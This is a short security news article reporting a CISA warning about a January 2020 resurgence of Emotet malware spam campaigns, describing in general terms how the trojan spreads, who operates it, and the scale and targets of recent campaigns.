The U.S. Department of Homeland Security Cybersecurity and Infrastructure Security Agency (CISA) has issued a warning over an increase in Emotet malware activity.
The Emotet botnet sprung back to life on January 13, 2020 with largescale spamming campaigns detected spreading the Emotet Trojan.
The Emotet Trojan is a modular malware that serves as a banking Trojan, information stealer, and malware downloader. The Trojan can move laterally by brute forcing user credentials and writing itself to shared drives. It also spreads by sending copies of itself via email from an infected device. Emotet uploads email data from an inbox on an infected device and the information is used to craft emails which are sent to the victim’s contacts.
Emotet was developed by a threat group called TA542. TA542 often works with other malware developers, renting out its botnet to spread additional malicious payloads such as cryptocurrency miners, cryptowallet stealers, the TrickBot Trojan, and Ryuk ransomware.
Emotet is primarily spread via spam email with Office file attachments that contain malicious macros that download the Trojan via PowerShell commands. The office files masquerade as invoices, purchase orders, receipts, statements, agreements, and other document types commonly used by businesses. Business are the main target, although all devices are at risk of attack.
Some of the campaigns detected in the past few days have been targeted on specific industry sectors such as the pharmaceutical industry. Proofpoint identified one pharma-focused campaign that saw almost 750,000 emails sent in a single day. The attacks were initially targeted on companies in the United States, Canada, and Mexico, although the campaign then spread to 11 more countries. Other spamming campaigns have seen emails sent to users in more than 80 countries.
Emotet poses a major threat. Infections can result in data theft and considerable financial loss and reputation damage. Emotet malware attacks are difficult to remediate. Multiple devices on the network are often infected. They will re-infect other devices when the malware is removed.
CISA has issued detailed guidance on the malware and the steps that can be taken to improve defenses and remediate attacks.